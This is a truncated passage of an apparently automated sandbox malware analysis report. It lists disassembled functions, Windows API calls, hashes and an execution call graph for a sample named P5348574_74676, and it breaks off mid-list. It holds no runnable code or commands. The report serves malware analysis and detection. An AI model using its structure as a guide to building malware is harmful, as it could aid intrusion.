                                                    • Not Executed
                                                    control_flow_graph 281 2a08638-2a09af0 283 2a09af2-2a09af5 281->283 284 2a09af8-2a09b27 LoadLibraryExW 281->284 283->284 285 2a09b30-2a09b4d 284->285 286 2a09b29-2a09b2f 284->286 286->285
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A09909,00000800,00000000,00000000), ref: 02A09B1A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: bb3edf0dc4e13b2fda247da6ddeea6cbf226af2085e25c7b7130ad61d99d6067
                                                    • Instruction ID: 5c1a9873837d8e0289644294f7f1036f27f751cf7117d9dc25730dc90f7ab02c
                                                    • Opcode Fuzzy Hash: bb3edf0dc4e13b2fda247da6ddeea6cbf226af2085e25c7b7130ad61d99d6067
                                                    • Instruction Fuzzy Hash: 601133B29002498FCB10CF9AD484ADFBBF8EB58724F14802AE415A7200C7B8A945CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0838905C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 289 838905c-838a615 FindCloseChangeNotification 291 838a61e-838a646 289->291 292 838a617-838a61d 289->292 292->291
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0838A059,?,?), ref: 0838A608
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.557651885.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08380000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_8380000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 39df52f76e2b0998c3b1cfd51be19908c086a77ad73e0e0aa6135866fe9146ef
                                                    • Instruction ID: 51f54d646aa73c0b014e1df50184ae31c9b1e65a554c20c5d1302bfcd867f46d
                                                    • Opcode Fuzzy Hash: 39df52f76e2b0998c3b1cfd51be19908c086a77ad73e0e0aa6135866fe9146ef
                                                    • Instruction Fuzzy Hash: 3F1158B1800318CFCB10DF9AC4447EEBBF8EB58320F14845AD554B7600D378A984CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 083880A8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 306 83880a8-838811a PostMessageW 308 838811c-8388122 306->308 309 8388123-8388137 306->309 308->309
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0838810D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.557651885.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08380000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_8380000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: ed4ff07fa01e6abf58df8441a9113d0cc656fe93f68adc36fd110e3422d47578
                                                    • Instruction ID: f325b1d7c62b03d5a9f0e3c588547acb6d3e934b02976f0327aaf61485dc25fd
                                                    • Opcode Fuzzy Hash: ed4ff07fa01e6abf58df8441a9113d0cc656fe93f68adc36fd110e3422d47578
                                                    • Instruction Fuzzy Hash: 2A1106B68003499FDB50DF9AC885BDFFBF8EB58324F14841AE454A7600D378A544CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A0D744 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 301 2a0d744-2a0fe4a SetWindowLongW 303 2a0fe53-2a0fe67 301->303 304 2a0fe4c-2a0fe52 301->304 304->303
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,02A0FDC8,?,?,?,?), ref: 02A0FE3D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 563669e77b475e7ac85813786333d9b226d4d612b06d7b84b7d6e6e6164a93e1
                                                    • Instruction ID: a67b845a939d4517c312ab6ee548de63e2853f11db831ac9d42ce17a8bbf99de
                                                    • Opcode Fuzzy Hash: 563669e77b475e7ac85813786333d9b226d4d612b06d7b84b7d6e6e6164a93e1
                                                    • Instruction Fuzzy Hash: 051136B58003489FDB20DF8AD588BDEBBF8EB48324F10845AE919B7740C774A940CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A09428 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 295 2a09428-2a09468 296 2a09470-2a0949b GetModuleHandleW 295->296 297 2a0946a-2a0946d 295->297 298 2a094a4-2a094b8 296->298 299 2a0949d-2a094a3 296->299 297->296 299->298
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02A0948E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: b878d2366169e0da3e78e48ee416152b44978e964812319a3b1b071819a3035b
                                                    • Instruction ID: b6aa65b620768c1276890fe601e5e625714fa11ca6d4762c9b719c4d80c3c2bb
                                                    • Opcode Fuzzy Hash: b878d2366169e0da3e78e48ee416152b44978e964812319a3b1b071819a3035b
                                                    • Instruction Fuzzy Hash: 581102B5C002498FCB10CF9AD484ADFFBF8AF48728F14841AD469A7610D379A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 083880B0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0838810D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.557651885.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08380000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_8380000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 57258ce2167c2343b94d1643a6d539fcffdc086353c832f89a8cd96485f0e83e
                                                    • Instruction ID: c5d53376b79a1c187f1e64c8b3f4d0d30f88a4274e6cecfaefcb01680d725950
                                                    • Opcode Fuzzy Hash: 57258ce2167c2343b94d1643a6d539fcffdc086353c832f89a8cd96485f0e83e
                                                    • Instruction Fuzzy Hash: 7511E5B5800349DFDB10DF9AD984BDEBBF8EB58324F14841AE554A7600D379A984CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A0FDD8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,02A0FDC8,?,?,?,?), ref: 02A0FE3D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: a194ed069c7422019ac50ed3735a99a137d987fdb242504acc318a12b53cfba6
                                                    • Instruction ID: 4ed7bfc9ffeb41d3a585ca21bd0060532c251b238a0f0249c10987a04f30b8ab
                                                    • Opcode Fuzzy Hash: a194ed069c7422019ac50ed3735a99a137d987fdb242504acc318a12b53cfba6
                                                    • Instruction Fuzzy Hash: 641122B58002088FCB20CF99D589BDEBBF8EB48324F14845AD858B7640D378A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00DAD4C4 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.552947032.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_dad000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36c4fdf396c405ee17b92cfa8bb1a8516fe0df1bb38865016738922a9c60f168
                                                    • Instruction ID: 3239b37876a228c1dcff84c67d094bbe79dfc467405e98e3fb3d96fe3f760998
                                                    • Opcode Fuzzy Hash: 36c4fdf396c405ee17b92cfa8bb1a8516fe0df1bb38865016738922a9c60f168
                                                    • Instruction Fuzzy Hash: 57212871904240DFDB01DF14D9C0B26BF66FB8A318F24C569E8460BA46C33AD845DBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00DBD01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.552969458.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_dbd000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f0a5494cb20609d37fb77ff4e120acec416cb648aa9e2e3dc0c13e3eccd895fc
                                                    • Instruction ID: 565aa0d07052da326e0cddad69248579b36c17b8c2d65e38a054d73f69789a34
                                                    • Opcode Fuzzy Hash: f0a5494cb20609d37fb77ff4e120acec416cb648aa9e2e3dc0c13e3eccd895fc
                                                    • Instruction Fuzzy Hash: 20213475604240DFCB14EF14D8C0B66BFA6FB88324F24C56DE84A0B246D33AD807CA71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00DBD005 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.552969458.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_dbd000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce359a89fcdac213d623ab4537e2986827827f35a5233cbc01aeb75e2c3dcbae
                                                    • Instruction ID: 8c25114f5e26cf516f071d9716c767c8bd19d908b9d62175605c581bc0941c94
                                                    • Opcode Fuzzy Hash: ce359a89fcdac213d623ab4537e2986827827f35a5233cbc01aeb75e2c3dcbae
                                                    • Instruction Fuzzy Hash: AD2180755093C0CFCB12DF24D990755BF72EB46314F28C5EAD8498B697C33A980ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00DAD4BF Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.552947032.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_dad000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                    • Instruction ID: 85779f45fe3c68d5878dab07815048c7506628820b029819178a67dc69a29ca3
                                                    • Opcode Fuzzy Hash: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                    • Instruction Fuzzy Hash: 5D11E676904280DFCB12CF14D5C4B16BF72FB85324F28C6A9D8450BA56C33AD856CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00DAD731 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.552947032.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_dad000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf2218c2fde685dc540f1f4401aa231ad99032d019c25a69ad3e52d286b7ec21
                                                    • Instruction ID: 1ca4af06ce0510ec886c28650510cff4622d525a790ae2905114dda723937939
                                                    • Opcode Fuzzy Hash: bf2218c2fde685dc540f1f4401aa231ad99032d019c25a69ad3e52d286b7ec21
                                                    • Instruction Fuzzy Hash: 6B01F2714083849AE7144A29CCC4BA6BFD9EF92724F28C45AED575B642D378D844CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00DAD730 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.552947032.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_dad000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37f54359ce02add8da0d9f757da2cb567a37f08f1a8d9576b9b88da3e1509abd
                                                    • Instruction ID: 2e8c0b04f085e52e316c61211929937dba898170f0a80b31831765faaf0bca6f
                                                    • Opcode Fuzzy Hash: 37f54359ce02add8da0d9f757da2cb567a37f08f1a8d9576b9b88da3e1509abd
                                                    • Instruction Fuzzy Hash: 38F0C2724042849AE7148E16CCC4B66FFDCEB91734F28C55AED595F682C3789C44CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 02A0E418 Relevance: .3, Instructions: 315COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f49d6bb09c35f2a5644d15476339a5fb0aebc31bfe7af4349fe3abf9a422a1be
                                                    • Instruction ID: 92db9cff4606ca0356f114ea3a34fa2a10be5074971487336d962289298c5784
                                                    • Opcode Fuzzy Hash: f49d6bb09c35f2a5644d15476339a5fb0aebc31bfe7af4349fe3abf9a422a1be
                                                    • Instruction Fuzzy Hash: B812C5F1C917468AD710CF65E99C2893BA1F765328FD04B08D2A12BAD0DBB6916FCF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A0B7BC Relevance: .3, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1964377cc7d1ea2eb79ea82b5080752adc6e374e6cc5bd96ca48052c755f8fd7
                                                    • Instruction ID: c561b35e935e5cf1401fcf8aeed60cf8dac290460f338056ac890be8d8e833fb
                                                    • Opcode Fuzzy Hash: 1964377cc7d1ea2eb79ea82b5080752adc6e374e6cc5bd96ca48052c755f8fd7
                                                    • Instruction Fuzzy Hash: 46A16C32E006198FCF05DFA5D98459EBBB2FF85304B15856AE905BB2A4EF31E915CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A0E408 Relevance: .2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.553155735.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2a00000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0c140108e0e576ea712015053e4558f5b0a58980fd6efe08ed31b0633f8ca40
                                                    • Instruction ID: feb87cc3ef38be234a4f2eadd0a4ad236c396ed0e0b92044d155e0ea555859c9
                                                    • Opcode Fuzzy Hash: e0c140108e0e576ea712015053e4558f5b0a58980fd6efe08ed31b0633f8ca40
                                                    • Instruction Fuzzy Hash: 1FC127F1C917468AD714CF65E88C2893BB1FBA5328F904B09D2616B6D0DFB6906BCF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 08380011 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.557651885.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08380000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_8380000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f138dbfd9daf058b0f48258d344edb25bab81e5f9e9ab720687f3815e68983dd
                                                    • Instruction ID: 13c18d547d287ac540104e4e742225ca4a0fd9efc66014b433cd4742fd319092
                                                    • Opcode Fuzzy Hash: f138dbfd9daf058b0f48258d344edb25bab81e5f9e9ab720687f3815e68983dd
                                                    • Instruction Fuzzy Hash: 404151B1D05A588BE75DCF6B8D4068AFAF3AFC9201F18C5FA884CAB265DB3405458F11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 08386EBE Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.557651885.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08380000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_8380000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: afc2239a8ffa6c43b75ab2bb609f80f2c1a97a92ffd0e5b36e18e253f578f375
                                                    • Instruction ID: 512abf3467508c898c6f37d73e48ca055550bdecf5e6c3be072a70aa6f24fd81
                                                    • Opcode Fuzzy Hash: afc2239a8ffa6c43b75ab2bb609f80f2c1a97a92ffd0e5b36e18e253f578f375
                                                    • Instruction Fuzzy Hash: 3031ABB1E056288BEB68DF67D9153DABAF3AFC5305F04C0EAC50CA6254DB750A858F41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:3.9%
                                                    Dynamic/Decrypted Code Coverage:2.5%
                                                    Signature Coverage:4.6%
                                                    Total number of Nodes:679
                                                    Total number of Limit Nodes:84
                                                    execution_graph 33206 4200a3 33209 41e783 33206->33209 33214 41f1b3 33209->33214 33211 41e79f 33218 17f9a00 LdrInitializeThunk 33211->33218 33212 41e7ba 33216 41f238 33214->33216 33217 41f1c2 33214->33217 33216->33211 33217->33216 33219 4195b3 33217->33219 33218->33212 33220 4195cd 33219->33220 33221 4195c1 33219->33221 33220->33216 33221->33220 33224 419a33 LdrLoadDll 33221->33224 33223 41971f 33223->33216 33224->33223 33225 40b4c3 33226 40b4e8 33225->33226 33231 40cf03 33226->33231 33230 40b540 33232 40cf27 33231->33232 33233 40cf63 LdrLoadDll 33232->33233 33234 40b51b 33232->33234 33233->33234 33234->33230 33235 40eac3 33234->33235 33236 40eaef 33235->33236 33246 41e3e3 33236->33246 33239 40eb0f 33239->33230 33241 40eb32 33241->33239 33258 41ea13 LdrLoadDll 33241->33258 33243 40eb4a 33259 41e693 33243->33259 33245 40eb6d 33245->33230 33247 41f1b3 LdrLoadDll 33246->33247 33248 40eb08 33247->33248 33248->33239 33249 41e423 33248->33249 33250 41e43f 33249->33250 33251 41f1b3 LdrLoadDll 33249->33251 33262 17f9710 LdrInitializeThunk 33250->33262 33251->33250 33252 41e45a 33252->33241 33253 41f1b3 LdrLoadDll 33252->33253 33254 41e47f 33253->33254 33263 17f9910 LdrInitializeThunk 33254->33263 33255 41e49e 33255->33241 33258->33243 33260 41e6af NtClose 33259->33260 33261 41f1b3 LdrLoadDll 33259->33261 33260->33245 33261->33260 33262->33252 33263->33255 33264 401664 33265 401691 33264->33265 33269 4233a3 33265->33269 33272 42339f 33265->33272 33266 4017a6 33276 41fbe3 33269->33276 33273 4233a3 33272->33273 33274 41fbe3 22 API calls 33273->33274 33275 4233ae 33274->33275 33275->33266 33277 41fc09 33276->33277 33290 40be93 33277->33290 33279 41fc15 33289 41fc79 33279->33289 33298 410083 33279->33298 33281 41fc34 33282 41fc47 33281->33282 33310 410043 33281->33310 33285 41fc5c 33282->33285 33319 41e8b3 33282->33319 33315 403513 33285->33315 33287 41fc6b 33288 41e8b3 2 API calls 33287->33288 33288->33289 33289->33266 33293 40bea0 33290->33293 33322 40bde3 33290->33322 33292 40bea7 33292->33279 33293->33292 33334 40bd83 33293->33334 33299 4100af 33298->33299 33729 40d3d3 33299->33729 33301 4100c1 33733 40ff53 33301->33733 33304 4100f4 33307 410105 33304->33307 33309 41e693 2 API calls 33304->33309 33305 4100dc 33306 4100e7 33305->33306 33308 41e693 2 API calls 33305->33308 33306->33281 33307->33281 33308->33306 33309->33307 33311 4195b3 LdrLoadDll 33310->33311 33312 410062 33311->33312 33313 410069 33312->33313 33314 41006b GetUserGeoID 33312->33314 33313->33282 33314->33282 33316 403550 33315->33316 33318 403577 33316->33318 33752 40dd63 33316->33752 33318->33287 33320 41f1b3 LdrLoadDll 33319->33320 33321 41e8d2 ExitProcess 33320->33321 33321->33285 33323 40bdf6 33322->33323 33373 41ce53 LdrLoadDll 33322->33373 33353 41cd23 33323->33353 33326 40be09 33326->33293 33327 40bdff 33327->33326 33356 41f533 33327->33356 33329 40be46 33329->33326 33367 40bc23 33329->33367 33331 40be66 33374 40b683 LdrLoadDll 33331->33374 33333 40be78 33333->33293 33335 40bda0 33334->33335 33336 41f823 LdrLoadDll 33334->33336 33710 41f823 33335->33710 33336->33335 33339 41f823 LdrLoadDll 33340 40bdcd 33339->33340 33341 40fe43 33340->33341 33342 40fe5c 33341->33342 33714 40d253 33342->33714 33344 40fe6f 33345 41e3e3 LdrLoadDll 33344->33345 33346 40fe7e 33345->33346 33352 40beb8 33346->33352 33718 41e9d3 33346->33718 33348 40fe95 33351 40fec0 33348->33351 33721 41e463 33348->33721 33350 41e693 2 API calls 33350->33352 33351->33350 33352->33279 33354 41cd38 33353->33354 33375 41e803 LdrLoadDll 33353->33375 33354->33327 33357 41f54c 33356->33357 33376 4191a3 33357->33376 33359 41f564 33360 41f56d 33359->33360 33415 41f373 33359->33415 33360->33329 33362 41f581 33362->33360 33432 41e103 33362->33432 33366 41f5b5 33437 4200e3 33366->33437 33688 409423 33367->33688 33369 40bc44 33369->33331 33370 40bc3d 33370->33369 33701 4096e3 33370->33701 33373->33323 33374->33333 33375->33354 33377 4191b7 33376->33377 33378 4194e6 33376->33378 33377->33378 33440 41de53 33377->33440 33378->33359 33381 4192e8 33443 41e563 33381->33443 33382 4192cb 33500 41e663 LdrLoadDll 33382->33500 33385 41930f 33387 4200e3 2 API calls 33385->33387 33386 4192d5 33386->33359 33393 41931b 33387->33393 33388 4194aa 33390 41e693 2 API calls 33388->33390 33389 4194c0 33506 418ec3 LdrLoadDll NtReadFile NtClose 33389->33506 33391 4194b1 33390->33391 33391->33359 33393->33386 33393->33388 33393->33389 33395 4193b3 33393->33395 33394 4194d3 33394->33359 33396 41941a 33395->33396 33398 4193c2 33395->33398 33396->33388 33397 41942d 33396->33397 33502 41e4e3 33397->33502 33400 4193c7 33398->33400 33401 4193db 33398->33401 33501 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33400->33501 33404 4193e0 33401->33404 33405 4193f8 33401->33405 33446 418e23 33404->33446 33405->33391 33458 418b43 33405->33458 33407 4193d1 33407->33359 33409 4193ee 33409->33359 33411 41948d 33413 41e693 2 API calls 33411->33413 33412 419410 33412->33359 33414 419499 33413->33414 33414->33359 33417 41f38e 33415->33417 33416 41f3a0 33416->33362 33417->33416 33524 420063 33417->33524 33419 41f3c0 33527 4187a3 33419->33527 33421 41f3e3 33421->33416 33422 4187a3 3 API calls 33421->33422 33424 41f405 33422->33424 33424->33416 33559 419b03 33424->33559 33425 41f48d 33426 41f49d 33425->33426 33654 41f133 LdrLoadDll 33425->33654 33570 41efa3 33426->33570 33429 41f4cb 33649 41e0c3 33429->33649 33431 41f4f5 33431->33362 33433 41f1b3 LdrLoadDll 33432->33433 33434 41e11f 33433->33434 33682 17f967a 33434->33682 33435 41e13a 33435->33366 33438 41f5df 33437->33438 33685 41e873 33437->33685 33438->33329 33441 41f1b3 LdrLoadDll 33440->33441 33442 41929c 33441->33442 33442->33381 33442->33382 33442->33386 33444 41f1b3 LdrLoadDll 33443->33444 33445 41e57f NtCreateFile 33444->33445 33445->33385 33447 418e3f 33446->33447 33448 41e4e3 LdrLoadDll 33447->33448 33449 418e60 33448->33449 33450 418e67 33449->33450 33451 418e7b 33449->33451 33453 41e693 2 API calls 33450->33453 33452 41e693 2 API calls 33451->33452 33455 418e84 33452->33455 33454 418e70 33453->33454 33454->33409 33507 420203 LdrLoadDll RtlAllocateHeap 33455->33507 33457 418e8f 33457->33409 33459 418bc1 33458->33459 33460 418b8e 33458->33460 33462 418d0c 33459->33462 33465 418bdd 33459->33465 33461 41e4e3 LdrLoadDll 33460->33461 33463 418ba9 33461->33463 33464 41e4e3 LdrLoadDll 33462->33464 33466 41e693 2 API calls 33463->33466 33470 418d27 33464->33470 33467 41e4e3 LdrLoadDll 33465->33467 33468 418bb2 33466->33468 33469 418bf8 33467->33469 33468->33412 33472 418c14 33469->33472 33473 418bff 33469->33473 33520 41e523 LdrLoadDll 33470->33520 33476 418c19 33472->33476 33480 418c2f 33472->33480 33475 41e693 2 API calls 33473->33475 33474 418d61 33477 41e693 2 API calls 33474->33477 33478 418c08 33475->33478 33479 41e693 2 API calls 33476->33479 33481 418d6c 33477->33481 33478->33412 33482 418c22 33479->33482 33485 418c34 33480->33485 33508 4201c3 33480->33508 33481->33412 33482->33412 33494 418c46 33485->33494 33511 41e613 33485->33511 33486 418c9a 33487 418cb1 33486->33487 33519 41e4a3 LdrLoadDll 33486->33519 33489 418cb8 33487->33489 33490 418ccd 33487->33490 33492 41e693 2 API calls 33489->33492 33491 41e693 2 API calls 33490->33491 33493 418cd6 33491->33493 33492->33494 33495 418d02 33493->33495 33514 41fee3 33493->33514 33494->33412 33495->33412 33497 418ced 33498 4200e3 2 API calls 33497->33498 33499 418cf6 33498->33499 33499->33412 33500->33386 33501->33407 33503 419475 33502->33503 33504 41f1b3 LdrLoadDll 33502->33504 33505 41e523 LdrLoadDll 33503->33505 33504->33503 33505->33411 33506->33394 33507->33457 33521 41e833 33508->33521 33510 4201db 33510->33485 33512 41f1b3 LdrLoadDll 33511->33512 33513 41e62f NtReadFile 33512->33513 33513->33486 33515 41fef0 33514->33515 33516 41ff07 33514->33516 33515->33516 33517 4201c3 2 API calls 33515->33517 33516->33497 33518 41ff1e 33517->33518 33518->33497 33519->33487 33520->33474 33522 41f1b3 LdrLoadDll 33521->33522 33523 41e84f RtlAllocateHeap 33522->33523 33523->33510 33525 420090 33524->33525 33655 41e743 33524->33655 33525->33419 33528 4187b4 33527->33528 33529 4187bc 33527->33529 33528->33421 33558 418a8f 33529->33558 33658 421263 33529->33658 33531 418810 33532 421263 2 API calls 33531->33532 33535 41881b 33532->33535 33533 418869 33536 421263 2 API calls 33533->33536 33535->33533 33537 421393 3 API calls 33535->33537 33669 421303 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33535->33669 33539 41887d 33536->33539 33537->33535 33538 4188da 33540 421263 2 API calls 33538->33540 33539->33538 33663 421393 33539->33663 33542 4188f0 33540->33542 33543 41892d 33542->33543 33546 421393 3 API calls 33542->33546 33544 421263 2 API calls 33543->33544 33545 418938 33544->33545 33547 421393 3 API calls 33545->33547 33553 418972 33545->33553 33546->33542 33547->33545 33549 418a67 33671 4212c3 LdrLoadDll RtlFreeHeap 33549->33671 33551 418a71 33672 4212c3 LdrLoadDll RtlFreeHeap 33551->33672 33670 4212c3 LdrLoadDll RtlFreeHeap 33553->33670 33554 418a7b 33673 4212c3 LdrLoadDll RtlFreeHeap 33554->33673 33556 